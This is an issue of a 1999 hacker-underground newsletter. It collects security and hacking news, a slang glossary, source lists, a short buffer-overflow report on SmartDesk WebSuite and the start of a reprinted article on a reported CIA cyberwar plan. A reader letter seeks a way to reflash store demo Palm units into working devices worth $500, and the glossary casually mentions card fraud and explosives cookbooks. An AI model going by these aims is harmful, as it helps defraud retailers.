[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 20 Volume 1 1999 May 29th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "There are two major products that come out of Berkeley: LSD and UNIX. We don't believe this to be a coincidence." -Jeremy S. Anderson HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #20 =-----------------------------------------------------------------------= "It is possible to provide security against other ills, but as far as death is concerned, we men live in a city without walls." -Epicurus We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #20 =--------------------------------------------------------------------------= "Wars have never hurt anybody except the people who die." -Salvador Dali [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Clinton Authorizes Cyber Attack??? .............................. 03.1 .. More on the 'Cyberwar'........................................... 04.0 .. RootFest Scares Officials In Minneapolis ........................ 05.0 .. Australia Admits to Echelon ..................................... 06.0 .. Banks to Test Home User PC Security ............................. 07.0 .. EMPEROR VIRUS.................................................... 08.0 .. WINHLP32.EXE BUFFER OVERRUN...................................... 09.0 .. NAI ON GALADRIEL VIRUS........................................... 10.0 .. Know your enemy parts 1,2 and 3.................................. 11.0 .. Cox Report Blasts DOE Computer Security ......................... 12.0 .. Black Hat Briefings Announced ................................... 13.0 .. eEYe Digital Security advisory: Multiple Web Interface Security Holes 14.0 .. Fun with ICQ..................................................... 15.0 .. FBI raids suspected hackers...................................... 15.1 .. Real life hacker wargames........................................ 16.0 .. MOD hacks Senate site............................................ 17.0 .. Backdoor-G a new 'backorifice like' trojan and BO2K.............. 18.0 .. [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine..... 19.0 .. [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer....... 20.0 .. Five Busted in Florida .......................................... 21.0 .. Danes Finger Swede for Cracking 12,000 Systems .................. 22.0 .. EFA Plans Net Censorship Demonstrations.......................... 23.0 .. Design Principals for Tamper-Resistant Smart Card Processors..... 24.0 .. Melissa finds a mate............................................. 25.0 .. punkz.com sets up a page for feedback on the presidential cyberwar 26.0 .. Its that time of month again, when the 26th rolls around, look out 27.0 .. Submission: "Be A Nice Hacker" by System......................... 28.0 .. Hacking Memes by Stephen Downes.................................. 29.0 .. [ISN] House panel aims to bolster security law................... 30.0 .. [ISN] NSA Taps Universities For Info Security Studies............ 31.0 .. [ISN] HushMail: free Web-based email with bulletproof encryption. 32.0 .. [ISN] E-Biz Bucks Lost Under SSL Strain.......................... 33.0 .. [ISN] Bracing for guerrilla warfare in cyberspace................ 34.0 .. [ISN] Prosecuting Lee Is Problematic............................. 35.0 .. [ISN] Slip of the Tongue Lightens up Encryption Hearing ......... 36.0 .. [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control", 37.0 .. [ISN] LCI Intros SMARTpen Biometric Signature Authentication..... 38.0 .. [ISN] CFP: DISC 99 Computer Security 99.......................... 39.0 .. [ISN] GAO: NASA systems full of holes............................ 39.1 .. [ISN] Nasa vulnerabilities potentially deadly.................... 40.0 .. Citrux Winframe client for Linux vulnerability................... 41.0 .. [ISN] Top 10 candidates for a "duh" list (general sec/crypto).... 42.0 .. Seeing invisible fields and avoiding them...the MicroAlarm....... 43.0 .. RelayCheck v1.0 scan for smtp servers that will relay mail....... 44.0 .. Admintool exploit for Solaris (Updated) by Shadow Penguin Security 45.0 .. AppManager 2.0 for NT from NetIQ displays passwords in cleartext 46.0 .. Cgichck99 ported to Rebol from Su1d Sh3ll's .c code.............. 47.0 .. ICSA certifies weak crypto as secure............................. 48.0 .. RAS and RRAS vulnerability....................................... 49.0 .. Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky 50.0 .. Vulnerability in pop2.imap....................................... 51.0 .. Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability' 52.0 .. Advisory: NT ODBC Remote Compromise............................... 53.0 .. Advisory: Buffer overflow in SmartDesk WebSuite v2.1.............. 54.0 .. Security Leak with IBM Netfinity Remote Control Software.......... 55.0 .. IBM eNetwork Firewall for AIX .................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for making my night albeit I couldn't stick around for the rest of the comedy routine. hacked star dot star with phf huh? .... ;-)) and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ THE FIRST TRUE CYPHERPUNK NOVEL (CULT. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/culture/story/19720.html Two generations of swashbuckling geeks tackle the forces of evil. Call it hip, call it funny. But you can't call it light summer reading. Declan McCullagh reviews Neal Stephenson's Cryptonomicon. (checkout www.cryptonomicon.com also - Ed) ++ STUDENTS ARRESTED From HNS http://www.net-security.org/ by BHZ, Friday 28th May 1999 on 12.02 am CET Five Flagler Palm Coast High School students - one the son of a Bunnell city commissioner - are facing a litany of criminal charges after authorities said they used a computer trojan to hack into the school's network and commandeer teacher and student files. Flagler County sheriff's deputies arrested the students Monday. All five were taken to the Division of Youth Services in Daytona Beach before being released to their parents. ++ FIGHT THE CENSORSHIP From HNS http://www.net-security.org/ by BHZ, Thursday 27th May 1999 on 9.53 pm CET Yesterday, the Australian Senate passed legislation to censor the Internet. In order to protest censorship people will join with like minded groups and individuals in a day of action against censorship. Download flyers here and sure do visit Electronic Frontiers Australia site. http://www.anatomy.usyd.edu.au/danny/freedom/march/ http://www.efa.org.au ++ SMARTDESK WEBSUITE BUFFER OVERFLOW From HNS http://www.net-security.org/ by BHZ, Thursday 27th May 1999 on 9.47 pm CET As posted on BugTraq by cmart: "WebSuite v2.1 will crash when an additional 250+ characters is appended after the sites URL on NT Server 4 and NT Workstation 4 boxes. Running on top of Windows 98 it will crash with 150+ characters appended after the sites URL. After reinstallating on both platforms several times, the overflow string length varied. Approximately 1 out of 8 times the overflow string went from 150 chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about 2000+ chars". ++ GETTING ZAPPED FOR BETTER Z'S (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19713.html Relief is on the way for chronic snorers and their partners. A new therapy uses radio waves to treat the breathing disorder known as sleep apnea. By Kristen Philipkoski Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacking the Palm Pilot demos... Date: Thu, 20 May 1999 23:56:05 -0400 From: scosha@home.com Organization: @Home Network X-Mailer: Mozilla 4.51 [en]C-AtHome0404 (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: hwa@press.usmc.net Subject: subject for newsleter Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit As we all know 3Com has recently released the Palm IIIx and V. The Palm V demo in store displays is a dummy unit with a hunk of lead inside. On the other hand the Palm IIIx is a fully working unit. There is a trick to make it work 100%. Like it's predecesor the Palm III the demo, if you could get your hands on one was not hard to reflash the OS rom and presto you had a Palm III worth $500.00 and there was little effort involved. The IIIx poses a little more difficulty. They have employed a new strategy. 1st 3Com went with the new Ezball Motorola Dragon processor, and put the Os in static non volitile memory. While it's not hard to download a fresh copy of the OS from a real store bought IIIx, the trick is in flashing the demo unit. The programs used to flash the III does not work on the IIIx, all you will get is a 'wrong header card version' message, which basiclly seals your fate. I have been working on trying to flash the proper OS replacing the demo OS (which won't allow you to input anything) to no avail. I put it out to the people who do these things best. I know not what to do from here. I have a few insiders helping but it is a much kept secret. zzcrazyman ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *Well things are moving along rather smoothly, its been a comparitively *slow (but interesting) week on the news front with some FBI action coming *down on people and shit, not a good time for hacker groups right now as *it looks like the crackdown is only going to get worse in the future. * *Anyway, drop into #hwa.hax0r.news the key is usually off and we're a *friendly bunch, stop by and chat about some of the stories here or that *you've seen elsewhere, other than that take it easy til next time... * *Here's #20, have at it... */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Clinton Authorizes Cyber Attack??? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sangfroid Reuters and Wired Online articles are referencing a print story in Newsweek that claims that President Clinton has authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Reuters also claimed that Newsweek said that the report instructed the CIA to wage "cyberwar" against Milosevic. Now there are still a few questions that are not answered in this news article. If the report was so top-secret how did NewsWeek learn of it? Won't other countries be rather upset when we "hack" into their banks? And aren't his bank accounts frozen anyway, so what is the point of breaking in? News week even admits that it does not have access to the original report. Once again until we see confirmation HNN will treat this story as extremely suspect. Newsweek http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm Reuters- Via Yahoo http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990523/ts/yugoslavia_usa_cyberwar_2.html Wired http://www.wired.com/news/news/politics/story/19836.html Newsweek EXCLUSIVE Cyberwar and Sabotage President Clinton has OK'd a top-secret plan to destabilize Milosevic—and go after his money By Gregory L. Vistica Covert action is seductive to policymakers in a bind. When diplomacy fails and force falls short, presidents often turn to the CIA for secret solutions to vexing problems. Unable to make the air war against Serbian leader Slobodan Milosevic effective, and unwilling to invade with ground troops, President Clinton has decided to try a clandestine third way. Earlier this month national-security adviser Sandy Berger presented Clinton with a covert plan to squeeze Milosevic. The president liked the idea. Senior intelligence officials tell NEWSWEEK that last week Clinton issued a "finding," a highly classified document authorizing the spy agency to begin secret efforts "to find other ways to get at Milosevic," in the words of one official. Two weeks ago Berger secretly briefed members of the House and Senate Intelligence committees about the details of the two-part plan. According to sources who have read the finding, the CIA will train Kosovar rebels in sabotage—age-old tricks like cutting telephone lines, blowing up buildings, fouling gasoline reserves and pilfering food supplies—in an effort to undermine public support for the Serbian leader and damage Yugoslav targets that can't be reached from the air. That much is unsurprising. But the CIA has also been instructed to conduct a cyberwar against Milosevic, using government hackers to tap into foreign banks and, in the words of one U.S. official, "diddle with Milosevic's bank accounts." The finding was immediately criticized by some lawmakers who questioned the wisdom—and legality—of launching a risky covert action that, if discovered, could prolong the war, alienate other NATO countries—and possibly blow back on the United States. Under the finding, the allies were to be kept in the dark about the plan. Other members of Congress privy to the finding wondered about its timing. Why did Clinton authorize the operation just as diplomats had begun making progress on a peace agreement? The White House declined to comment on the finding, and NEWSWEEK does not have access to the entire document. But some intelligence officials with knowledge of its contents worry that the finding was put together too hastily, and that the potential consequences haven't been fully thought out. "If they pull it off, it will be great," says one government cyberwar expert. "If they screw it up, they are going to be in a world of trouble." By far the most controversial—and probably most difficult—part of the operation would be the effort to hack into Milosevic's foreign bank accounts. 